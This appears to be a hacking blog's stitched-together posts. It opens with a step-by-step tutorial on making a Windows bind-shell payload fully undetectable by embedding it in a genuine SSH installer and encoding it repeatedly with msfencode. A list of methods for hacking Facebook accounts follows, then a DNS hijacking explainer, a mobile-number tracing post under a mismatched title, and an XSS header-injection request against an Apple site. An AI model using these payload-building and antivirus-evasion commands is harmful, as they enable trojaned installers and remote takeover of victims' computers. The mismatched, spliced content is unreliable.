Trick To Bypass Antivirus Detection | How to Make An Executable FUD

So in this tutorial we will show you step by step on how to make a virus Fully Undetectable from all the antiviruses. Thought their are lots of approaches, however our team member Malik Rafay has managed to find a way to make an executable FUD using msfencode.

Requirements

A Backtrack machine , real or virtual. I used Backtrack 5 r3, but other versions of Backtrack are working OK too !!!

Attention !!!

We are using some harmless test files but don't infect people with any real viruses that's a Crime and we here at atihackingtricks are not responsible for.

Purpose:

Antivirus protects machines from malware but not all of it .there are ways to pack malware to make it harder to detect. well use metasploit to render malware completely invisible to antivirus.

Creating a Listener:

This is a simple payload that gives the attacker remote control of a machine. It is not a virus ant won't spread, but it is detected by antivirus engines. In Backtrack in a Terminal windows execute these commands:

cd
msfpayload
 windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe
ls -l listen.exe

You should see the listen.exe file as shown below:

Analyzing the Listener with VirusTotal

Go to https://www.virustotal.com/en/

Click the "Choose File" button. Navigate to /root and double-click the listen.exe"listen.exe" appears in the "Choose File" box, as shown below:

In the virustotal web page , Click the "scan it" button !!!
If you see a "File already analyzed" message, click the "View last analysis" button.
The analysis shows that many of the antivirus engines detected the file--33 out of 42, when I did it, as shown below. You may see different numbers, but many of the engines should detect it.
Encoding the Listener

this process will encode the listener, & insert it into an innocent SSH file.
In BackTrack, in a Terminal window, execute these commands:
wget ftp://ftp.ccsf.edu/pub/SSH/sshSecureShellClient-3.2.9.exemsfencode -i /root/listen.exe -t exe -x /root/sshSecureShellClient-3.2.9.exe -k -o /root/evil_ssh.exe -e x86/shikata_ga_nai -c 1ls -l evil*

You should see the evil-ssh.exe file as shown below :

Scan with virusTOTAL

Go to: https://www.virustotal.com/
If you see a "File already analyzed" message, click the "View last analysis" button.
The analysis shows that fewer of the antivirus engines detect the file now--21 out of 42, when I did it, as shown below. You may see different numbers.

Encode the Listener Again This process will encode the listener with several different encodings.

In BackTrack, in a Terminal window, execute these commands:
msfencode -i /root/listen.exe -t raw -o /root/listen2.exe -e x86/shikata_ga_nai -c 1msfencode -i /root/listen2.exe -t raw -o

/root/listen3.exe -e x86/jmp_call_additive -c 1
msfencode -i /root/listen3.exe -t raw -o /root/listen4.exe -e x86/call4_dword_xor -c 1

msfencode -i /root/listen4.exe -o /root/listen5.exe -e x86/shikata_ga_nai -c 1ls -l listen*
You should see several files as shown below :

Analyzing Again
The analysis shows that fewer of the antivirus engines detect the file now 0 out of 42 When I did it as shown below. you may see different numbers.

Note:-It was originally Published by hacky shacky  and I re-shared in my blog. So lets check out how to works.

Latest 10 Ways to Hack on Facebook Account passwords

Facebook is one of the most widely used social networking site with more than 750 million users, as a reason if which it has become the number 1 target of hackers have , I have written a couple of post related to facebook hacking here. I mentioned the top methods which were used by hackers to hack facebook accounts, however lots of things have changed in 2013, Lots of methods have went outdated or have been patched up by facebook and lots of new methods have been introduced, So in this post I will write the top 10 methods how hackers can hack facebook accounts.

10 Ways How Hackers Can Hack Facebook Accounts

So here are the top 10 methods which have been the most popular in 2012:

1. Facebook Phishing

Phishing still is the most popular attack vector used for hacking facebook accounts, There are variety of methods to carry out phishing attack, In a simple phishing attacks a hacker creates a fake login page which exactly looks like the real facebook page and then asks the victim to login into that page, Once the victim logins through the fake page the victims "Email Address" and "Password" is stored in to a text file, The hacker then downloads the text file and get's his hands on the victims credentials.

2. Keylogging

Keylogging, according to me is the easiest way to hack a facebook password, Keylogging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A keylogger is basically a small program which once is installed on victims computer will record every thing which victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address.

3. Stealers

Almost 80% percent people use stored passwords in their browser to access the facebook, This is is quite convenient but can sometimes be extremely dangerous, Stealers are software's specially designed to capture the saved passwords stored in the victims browser, Stealers once FUD can be extremely powerful.
4. Session Hijacking

Session Hijacking can be often very dangerous if you are accessing Facebook on a http:// connection, In a Session Hijacking attack a hacker steals the victims browser cookie which is used to authenticate a user on a website and uses to it to access victims account, Session hijacking is widely used on Lan's.

5. Sidejacking With Firesheep
Sidejacking attack went common in late 2010, however it's still popular now a days, Firesheep is widely used to carry out sidejacking attacks, Firesheep only works when the attacker and victim is on the same wifi network. A sidejacking attack is basically another name for http session hijacking, but it's more targeted towards wifi users.
6. Mobile Phone Hacking

Millions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victims mobile phone then he can probably gain access to his/her Facebook account. Their are lots of Mobile Spying softwares used to monitor a Cellphone.
7. DNS Spoofing

If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original facebook.com page to his own fake page and hence can get access to victims facebook account.

8. USB Hacking

If an attacker has physical access to your computer, he could just insert a USB programmed with a function to automatically extract saved passwords in the browser.

9. Man In the Middle Attacks

If the victim and attacker are on the same lan and on a switch based network, A hacker can place himself b/w the client and the server or he could also act as a default gateway and hence capturing all the traffic in between, ARP Poisoning which is the other name for man in the middle attacks is a very broad topic and is beyond the scope of this article,
10. Botnets

Botnets are not commonly used for hacking facebook accounts, because of it's high setup costs, They are used to carry more advanced attacks, A botnet is basically a collection of compromised computer, The infection process is same as the keylogging, however a botnet gives you, additional options in for carrying out attacks with the compromised computer. Some of the most popular botnets include Spyeye and Zeus.

What is DNS Hijacking and How it Works?

DNS hijacking (sometimes referred to as DNS redirection) is a type of malicious attack that overrides a computer’s TCP/IP settings to point it at a rogue DNS server, thereby invalidating the default DNS settings. In other words, when an attacker takes control of a computer to alter its DNS settings so that it now points to a rogue DNS server, the process is referred to as DNS hijacking.
As we all know, the “Domain Name System (DNS)” is mainly responsible for translating a user friendly domain name such as “google.com” to its corresponding IP address “74.125.235.46″. Having a clear idea of DNS and its working can help you better understand what DNS hijacking is all about. If you are fairly new to the concept of DNS, I would recommend reading my previous post on How Domain Name System Works.

How DNS Hijacking Works?

As mentioned before, DNS is the one that is responsible for mapping the user friendly domain names to their corresponding IP addresses. This DNS server is owned and maintained by your Internet service provider (ISP) and many other private business organizations. By default, your computer is configured to use the DNS server from the ISP. In some cases, your computer may even be using the DNS services of other reputed organizations such as Google. In this case, you are said to be safe and everything seems to work normally.
But, imagine a situation where a hacker or a malware program gains unauthorized access to your computer and changes the DNS settings, so that your computer now uses one of the rogue DNS servers that is owned and maintained by the hacker. When this happens, the rogue DNS server may translate domain names of desirable websites (such as banks, search engines, social networking sites etc.) to IP addresses of malicious websites. As a result, when you type the URL of a website in the address bar, you may be taken to a fake website instead of the one you are intending for. Sometimes, this can put you in deep trouble!

What are the Dangers of DNS Hijacking?

The dangers of DNS hijacking can vary and depend on the intention behind the attack. Many ISPs such as “OpenDNS” and “Comcast” use DNS hijacking for introducing advertisements or collecting statistics. Even though this can cause no serious damage to the users, it is considered as a violation of RFC standards for DNS responses.
Other dangers of DNS hijacking include the following attacks:
Pharming: This is a kind of attack where a website’s traffic is redirected to another website that is a fake one. For example, when a user tries to visit a social networking website such as Facebook.com he may be redirected to another website that is filled with pop-ups and advertisements. This is often done by hackers in order to generate advertising revenue.
Phishing: This is a kind of attack where users are redirected to a malicious website whose design (look and feel) matches exactly with that of the original one. For example, when a user tries to log in to his bank account, he may be redirected to a malicious website that steals his login details.

How to Prevent DNS Hijacking?

In most cases, attackers make use of malware programs such as a trojan horse to carry out DNS hijacking. These DNS hacking trojans are often distributed as video and audio codecs, video downloaders, YoTube downloaders or as other free utilities. So, in order to stay protected, it is recommended to stay away from untrusted websites that offer free downloads. The DNSChanger trojan is an example of one such malware that hijacked the DNS settings of over 4 million computers to drive a profit of about 14 million USD through fraudulent advertising revenue.
Also, it is necessary to change the default password of your router so that it would not be possible for the attacker to modify your router settings using the default password that came with the factory setting. For more details on this topic you can read my other post on How to hack an Ethernet ADSL Router.
Installing a good antivirus program and keeping it up-to-date can offer a great deal of protection to your computer against any such attacks.

What if you are already a victim of DNS hijacking?

If you suspect that your computer is infected with a malware program such as DNSChanger, you need not panic. It is fairly simple and easy to recover from the damage caused by such programs. All you have to do is, just verify your current DNS settings to make sure that you are not using any of those DNS IPs that are blacklisted. Otherwise re-configure your DNS settings as per the guidelines of your ISP.

How to Hack Symbian S60 Phones to Install Unsigned Applications

With the rapid growth of mobile phone usage in recent years, we have often observed that the it has become a part of many illegal and criminal activities. So, in most cases tracing the mobile number becomes a vital part of the investigation process. Also, sometimes we just want to trace a mobile number for reasons like annoying prank calls, blackmails, unknown number in a missed call list or similar.
Even though it is not possible to trace the number back to the caller, it is possible to trace it to the location of the caller and also find the network operator. Just have a look at this page on tracing Indian mobile numbers from Wikipedia. Using the information provided on this page, it is possible to certainly trace any mobile number from India and find out the location (state/city) and network operator (mobile operator) of the caller.
All you need for this is only the first 4-digit of the mobile number. In this Wiki page you will find all the mobile number series listed in a nice tabular column where they are categorized based on mobile operator and the zone (state/city). This Wiki page is updated regularly so as to provide up-to-date information on newly added mobile number series and operators. I have used this page many a time and have never been disappointed.
If you would like to use a simpler interface where in you can just enter the target mobile number and trace the desired details, you can try this link from Numbering Plans. Using this link, you can trace any number in the world.
By using the information in this article, you can only know “where” the call is from and not “who” the caller is. Only the mobile operator is able to tell you ”who” the caller is. So, if you are in an emergency and need to find out the actual person behind the call, I would recommend that you file a complaint and take the help of police. I hope this information has helped you!

HTTP Header Injection Vulnerability

HTTP Header

HTTP Header is the component of HTTP requests and responces. Header fields are transimitted with each request and responce and carry additional data about the requests and responces.

See the typical request and responce headers Here at Web-Sniffer.net

HTTP header injection

HTTP header injection is a kind of web application vulnerability which exists on those web applications that generatd HTTP headers based on the input given by users. If it uses User based input in the headers, it can be used for HTTP response splitting, cross-site scripting (XSS), Session fixation via the Set-Cookie header, and malicious redirects attacks via the location header.

I recently found a similar kind of vulnerability in http://canadaedu.apple.com and for this I was also acknowledged by Apple on its website.

It used apache 1.3.33 that was vulnerable to the HTML and malicious javascript injection through  "Expect" header.

See the responce header of the website:
GET / HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: canadaedu.apple.com
Cookie: PHPSESSID=3b8026225d719c6945155129c5c7335d
Connection: Close
Expect: <script>alert(411731119275)</script>
Pragma: no-cache
